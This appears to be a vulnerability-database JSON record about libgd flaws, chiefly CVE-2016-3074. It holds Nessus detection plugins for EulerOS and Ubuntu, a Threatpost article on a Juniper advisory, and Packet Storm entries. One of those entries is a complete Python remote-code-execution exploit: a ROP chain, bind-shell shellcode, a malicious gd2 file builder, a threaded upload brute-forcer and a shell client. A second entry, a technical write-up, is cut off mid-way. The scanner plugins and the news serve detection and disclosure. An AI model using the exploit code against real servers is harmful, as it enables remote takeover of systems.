following\nvulnerabilities :\n\n - Integer signedness error in GD Graphics Library 2.1.1\n (aka libgd or libgd2) allows remote attackers to cause\n a denial of service (crash) or potentially execute\n arbitrary code via crafted compressed gd2 data, which\n triggers a heap-based buffer overflow.(CVE-2016-3074)\n\n - The output function in gd_gif_out.c in the GD Graphics\n Library (aka libgd) allows remote attackers to cause a\n denial of service (out-of-bounds read) via a crafted\n image.(CVE-2016-6161)\n\n - Stack consumption vulnerability in the\n gdImageFillToBorder function in gd.c in the GD Graphics\n Library (aka libgd) before 2.2.2, as used in PHP before\n 5.6.28 and 7.x before 7.0.13, allows remote attackers\n to cause a 
denial of service (segmentation violation)\n via a crafted imagefilltoborder call that triggers use\n of a negative color value.(CVE-2016-9933)\n\n - Double free vulnerability in the gdImagePngPtr function\n in libgd2 before 2.2.5 allows remote attackers to cause\n a denial of service via vectors related to a palette\n with no colors.(CVE-2017-6362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-19T00:00:00", "title": "EulerOS 2.0 SP3 : gd (EulerOS-SA-2019-2583)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9933", "CVE-2016-6161", "CVE-2016-3074", "CVE-2017-6362"], "modified": "2019-12-19T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:gd", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2583.NASL", "href": "https://www.tenable.com/plugins/nessus/132300", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132300);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-3074\",\n \"CVE-2016-6161\",\n \"CVE-2016-9933\",\n \"CVE-2017-6362\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : gd (EulerOS-SA-2019-2583)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gd package installed, the EulerOS\ninstallation on the remote host is affected by the 
following\nvulnerabilities :\n\n - Integer signedness error in GD Graphics Library 2.1.1\n (aka libgd or libgd2) allows remote attackers to cause\n a denial of service (crash) or potentially execute\n arbitrary code via crafted compressed gd2 data, which\n triggers a heap-based buffer overflow.(CVE-2016-3074)\n\n - The output function in gd_gif_out.c in the GD Graphics\n Library (aka libgd) allows remote attackers to cause a\n denial of service (out-of-bounds read) via a crafted\n image.(CVE-2016-6161)\n\n - Stack consumption vulnerability in the\n gdImageFillToBorder function in gd.c in the GD Graphics\n Library (aka libgd) before 2.2.2, as used in PHP before\n 5.6.28 and 7.x before 7.0.13, allows remote attackers\n to cause a denial of service (segmentation violation)\n via a crafted imagefilltoborder call that triggers use\n of a negative color value.(CVE-2016-9933)\n\n - Double free vulnerability in the gdImagePngPtr function\n in libgd2 before 2.2.5 allows remote attackers to cause\n a denial of service via vectors related to a palette\n with no colors.(CVE-2017-6362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2583\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7bb5735\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"gd-2.0.35-26.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:43:42", "description": "It was discovered that the GD library incorrectly handled certain\ncolor tables in XPM images. 
If a user or automated system were tricked\ninto processing a specially crafted XPM image, an attacker could cause\na denial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain\nmalformed GIF images. If a user or automated system were tricked into\nprocessing a specially crafted GIF image, an attacker could cause a\ndenial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageFillToBorder(). A remote attacker could possibly use this\nissue to cause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageScaleTwoPass(). A remote attacker could possibly use this\nissue to cause a denial of service. This issue only applied to Ubuntu\n14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly\nhandled certain malformed GD images. If a user or automated system\nwere tricked into processing a specially crafted GD image, an attacker\ncould cause a denial of service or possibly execute arbitrary code.\n(CVE-2016-3074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-01T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : libgd2 vulnerabilities (USN-2987-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libgd2-noxpm", "p-cpe:/a:canonical:ubuntu_linux:libgd2-xpm", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "p-cpe:/a:canonical:ubuntu_linux:libgd3", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2987-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2987-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91423);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2019/09/18 12:31:45\");\n\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2015-8874\", \"CVE-2015-8877\", \"CVE-2016-3074\");\n script_xref(name:\"USN\", value:\"2987-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : libgd2 vulnerabilities (USN-2987-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the GD library incorrectly handled certain\ncolor tables in XPM images. If a user or automated system were tricked\ninto processing a specially crafted XPM image, an attacker could cause\na denial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain\nmalformed GIF images. If a user or automated system were tricked into\nprocessing a specially crafted GIF image, an attacker could cause a\ndenial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageFillToBorder(). A remote attacker could possibly use this\nissue to cause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageScaleTwoPass(). A remote attacker could possibly use this\nissue to cause a denial of service. This issue only applied to Ubuntu\n14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly\nhandled certain malformed GD images. 
If a user or automated system\nwere tricked into processing a specially crafted GD image, an attacker\ncould cause a denial of service or possibly execute arbitrary code.\n(CVE-2016-3074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2987-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgd2-noxpm, libgd2-xpm and / or libgd3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgd2-noxpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgd2-xpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgd3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/21\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libgd2-noxpm\", pkgver:\"2.0.36~rc1~dfsg-6ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libgd2-xpm\", pkgver:\"2.0.36~rc1~dfsg-6ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libgd3\", pkgver:\"2.1.0-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libgd3\", pkgver:\"2.1.1-4ubuntu0.15.10.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgd3\", pkgver:\"2.1.1-4ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgd2-noxpm / libgd2-xpm / libgd3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:17", "bulletinFamily": "info", "cvelist": ["CVE-2016-3074"], "description": "Juniper Networks warned customers Thursday of a high-risk vulnerability in the GD graphics library that could allow a remote attacker to take control of systems running certain versions of the Junos OS.\n\nThe alert was in conjunction with a warning from the U.S. Computer Emergency Readiness Team (US-CERT) that said affected versions of the Junos OS were 12.1X46, 12.3X48, 15.1X49, 14.2, 15.1, 15.1X53, 16.1 and 16.2. 
Hardware running the software includes router models T Series and MX series along with four Juniper switch products.\n\nThe problem ([CVE-2016-3074](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074>)) is tied to the use of the open-source GD graphics library ([libgd](<https://github.com/libgd/libgd>)), which has been bundled with PHP since version 4.3.\n\n\u201cAn integer signedness vulnerability exists in libgd 2.1.1 which may result in a heap overflow when processing compressed gd2 data,\u201d the [Juniper Security Advisory](<https://www.us-cert.gov/ncas/current-activity/2017/08/09/Juniper-Networks-Releases-Junos-OS-Security-Updates>) said. Attackers can exploit this issue to execute arbitrary commands or cause a denial-of-service condition.\n\nUse of the flawed libgd library has stung a wide range of firms over the past year, including [HP Enterprise](<https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05240731>), [Red Hat](<https://access.redhat.com/security/cve/cve-2016-3074>), [Fedora](<https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html>) and [Debian](<http://www.debian.org/security/2016/dsa-3556>), each of which has issued a separate security bulletin on the library.\n\nCustomers are encouraged to update their software to the latest version. A workaround also exists: according to Juniper, it consists of disabling services that can utilize on-board PHP scripting, such as J-Web and XNM-SSL. Affected users can also choose to discontinue the use of Netconf and PyEZ with PHP.\n\n\u201cIn addition to the recommendations listed above, it is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. 
Use access lists or firewall filters to limit access to the device from trusted, administrative networks or hosts,\u201d Juniper advises.\n\nThe libgd vulnerability, as used by Juniper in its switches and routers, has a CVSS score of 8.1, making this a high-risk vulnerability.\n", "modified": "2017-08-10T17:56:38", "published": "2017-08-10T13:56:38", "id": "THREATPOST:2EDAD602D032B0A6F91130A32BBBBE6C", "href": "https://threatpost.com/juniper-issues-security-alert-tied-to-routers-and-switches/127373/", "type": "threatpost", "title": "Juniper Issues Security Alert Tied to Routers and Switches", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-01-17T03:04:28", "description": "", "published": "2017-01-17T00:00:00", "type": "packetstorm", "title": "PHP LibGD Heap Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2017-01-17T00:00:00", "id": "PACKETSTORM:140537", "href": "https://packetstormsecurity.com/files/140537/PHP-LibGD-Heap-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python2 \n# \n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and \n# php5-fpm running behind nginx. \n# \n# ,---- \n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n# | [*] this may take a while \n# | [*] offset 912 of 10000... \n# | [+] connected to 1.2.3.4:5555 \n# | id \n# | uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# | \n# | uname -a \n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n# | 2016 x86_64 x86_64 x86_64 GNU/Linux \n# | \n# | dpkg -l|grep -E \"php5-(fpm|gd)\" \n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... 
\n# | \n# | cat upload.php \n# | <?php \n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n# | ?> \n# `---- \n# \n# - Hans Jerry Illikainen \n# \nimport sys \nimport os \nimport zlib \nimport socket \nimport threading \nimport argparse \nimport urlparse \nfrom struct import pack \n \nimport requests \n \n# non-optimized bindshell from binjitsu \n# \n# context(arch=\"amd64\", os=\"linux\") \n# asm(shellcraft.bindsh(port, \"ipv4\")) \nshellcode = [ \n\"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\", \n\"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\", \n\"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\", \n\"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\", \n\"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\", \n\"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\", \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\", \n\"\\xe7\\x31\\xf6\\x99\\x0f\\x05\" \n] \n \ngadgets = [ \n\"\\x90\" * 40, \n \n# [16] \n# \n# 0xb6eca2: popfq \n# 0xb6eca3: callq *%rsp \npack(\"<Q\", 0xb6eca2), \n \n\"%(pad)s\", \n \n# [2] \n# \n# 0x4dbe8c: add $0xd8,%rsp \n# 0x4dbe93: retq \npack(\"<Q\", 0x4dbe8c), \n \n\"\\x90\" * 48, \n \n# [1] \n# \n# (gdb) x/x {void *}($rsp + 8) \n# 0x12d7d60: 0x9090909090909090 \n# \n# 0xa91f35: rex.WXB pop %r14 \n# 0xa91f37: mov $0x3,%bh \n# 0xa91f39: pop %rsp \n# 0xa91f3a: retq \npack(\"<Q\", 0xa91f35), \n \n\"\\x90\" * 152, \n \n# [0] \n# \n# (gdb) x/i $rip \n# => 0x7f91acf61f46: callq *0x70(%rax) \n# \n# (gdb) x/gx 0x432b80 \n# 0x432b80: 0x0000000000547880 \n# \n# (gdb) x/3i 0x0000000000547880 \n# 0x547880: push %rbx \n# 0x547881: mov %rdi,%rbx \n# 0x547884: callq *0x20(%rdi) \npack(\"<Q\", 0x432b80 - 0x70), \n \n# [3] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \n \n# [7] \n# \n# 0x463b1d: pop %r12 \n# 0x463b1f: retq \npack(\"<Q\", 0x463b1d), \n \n# [4] \n# 
\n# 0x473053: pop %rax \n# 0x473054: retq \npack(\"<Q\", 0x473053), \n \n# [6] \n# \n# 0xa8bc37: push %rdx \n# 0xa8bc38: jmpq *%rbx \npack(\"<Q\", 0xa8bc37), \n \n# [5] \n# \n# 0x7b2eaf: mov %r9,%rdx \n# 0x7b2eb2: jmpq *%rax \npack(\"<Q\", 0x7b2eaf), \n \n# [8] \n# \n# 0x552768: mov %rdi,%rax \n# 0x55276b: retq \npack(\"<Q\", 0x552768), \n \n# [9] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \npack(\"<Q\", 0xfffff000), \n \n# [10] \n# \n# 0xb6c734: and %ebx,%eax \n# 0xb6c736: es retq \npack(\"<Q\", 0xb6c734), \n \n# [11] \n# \n# 0x4c93e9: xchg %eax,%ebx \n# 0x4c93ea: retq \npack(\"<Q\", 0x4c93e9), \n \n# [12] \n# \n# 0x406a08: pop %rcx (len, 0x5555) \n# 0x406a09: retq \npack(\"<Q\", 0x406a08), \npack(\"<Q\", 0x5555), \n \n# [13] \n# \n# 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC) \n# 0xaf58fe: retq \npack(\"<Q\", 0xaf58fd), \npack(\"<Q\", 7), \n \n# [14] \n# \n# 0x473053: pop %rax (mprotect) \n# 0x473054: retq \npack(\"<Q\", 0x473053), \npack(\"<Q\", 125), \n \n# [15] \n# \n# 0x53f9f8: int $0x80 \n# 0x53f9fa: mov 0x38(%r12),%rsi \n# 0x53f9ff: mov $0x8f,%edi \n# 0x53fa04: callq *0x28(%r12) \npack(\"<Q\", 0x53f9f8), \n \n\"\\x90\" * 100, \n] \n \n# gd.h: #define gdMaxColors 256 \ngd_max_colors = 256 \n \n \ndef make_gd2(chunks): \ngd2 = [ \n\"gd2\\x00\", # signature \npack(\">H\", 2), # version \npack(\">H\", 1), # image size (x) \npack(\">H\", 1), # image size (y) \npack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80) \npack(\">H\", 2), # format (GD2_FMT_COMPRESSED) \npack(\">H\", 1), # num of chunks wide \npack(\">H\", len(chunks)) # num of chunks high \n] \ncolors = [ \npack(\">B\", 0), # trueColorFlag \npack(\">H\", 0), # im->colorsTotal \npack(\">I\", 0), # im->transparent \npack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i] \n] \n \noffset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8 \nfor data, size in chunks: \ngd2.append(pack(\">I\", offset)) # cidx[i].offset \ngd2.append(pack(\">I\", 
size)) # cidx[i].size \noffset += size \n \nreturn \"\".join(gd2 + colors + [data for data, size in chunks]) \n \n \ndef connect(host, port): \naddr = socket.gethostbyname(host) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect((addr, port)) \nexcept socket.error: \nreturn \n \nprint(\"\\n[+] connected to %s:%d\" % (host, port)) \nif os.fork() == 0: \nwhile True: \ntry: \ndata = sock.recv(8192) \nexcept KeyboardInterrupt: \nsys.exit(\"\\n[!] receiver aborting\") \nif data == \"\": \nsys.exit(\"[!] receiver aborting\") \nsys.stdout.write(data) \nelse: \nwhile True: \ntry: \ncmd = sys.stdin.readline() \nexcept KeyboardInterrupt: \nsock.close() \nsys.exit(\"[!] sender aborting\") \nsock.send(cmd) \n \n \ndef send_gd2(url, gd2, code): \nfiles = {\"file\": gd2} \ntry: \nreq = requests.post(url, files=files, timeout=5) \ncode.append(req.status_code) \nexcept requests.exceptions.ReadTimeout: \npass \n \n \ndef get_payload(offset, port): \nrop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset} \n \nfam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16))) \nsc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port} \n \nreturn rop + sc \n \n \ndef get_args(): \np = argparse.ArgumentParser() \np.add_argument(\"--threads\", type=int, default=20) \np.add_argument(\"--bind-port\", type=int, default=8000) \np.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2) \np.add_argument(\"url\") \nreturn p.parse_args() \n \n \ndef main(): \nargs = get_args() \nhost = urlparse.urlparse(args.url).netloc.split(\":\")[0] \n \nprint(\"[*] this may take a while\") \nfor i in range(args.offsets[0], args.offsets[1]): \nsys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1])) \nsys.stdout.flush() \n \nvalid = zlib.compress(\"A\" * 100, 0) \npayload = get_payload(i, args.bind_port) \ngd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)]) \n \nthreads = [] \ncode = [] \nfor _ in range(args.threads): \nt = 
threading.Thread(target=send_gd2, args=(args.url, gd2, code)) \nt.start() \nthreads.append(t) \n \nfor t in threads: \nt.join() \n \nif 404 in code: \nsys.exit(\"\\n[-] 404: %s\" % args.url) \nconnect(host, args.bind_port) \n \nprint(\"\\n[-] nope...\") \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140537/phplibgd-overflow.txt"}, {"lastseen": "2016-12-05T22:19:10", "description": "", "published": "2016-04-21T00:00:00", "type": "packetstorm", "title": "libgd 2.1.1 Signedness", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-21T00:00:00", "id": "PACKETSTORM:136757", "href": "https://packetstormsecurity.com/files/136757/libgd-2.1.1-Signedness.html", "sourceData": "`Overview \n======== \n \nlibgd [1] is an open-source image library. It is perhaps primarily used \nby the PHP project. It has been bundled with the default installation \nof PHP since version 4.3 [2]. \n \nA signedness vulnerability (CVE-2016-3074) exists in libgd 2.1.1 which \nmay result in a heap overflow when processing compressed gd2 data. \n \n \nDetails \n======= \n \n4 bytes representing the chunk index size are stored in a signed integer, \nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 53 typedef struct { \n| 54 int offset; \n| 55 int size; \n| 56 } \n| 57 t_chunk_info; \n`---- \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 65 static int \n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, \n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, \n| 68 t_chunk_info ** chunkIdx) \n| 69 { \n| ... \n| 73 t_chunk_info *cidx; \n| ... \n| 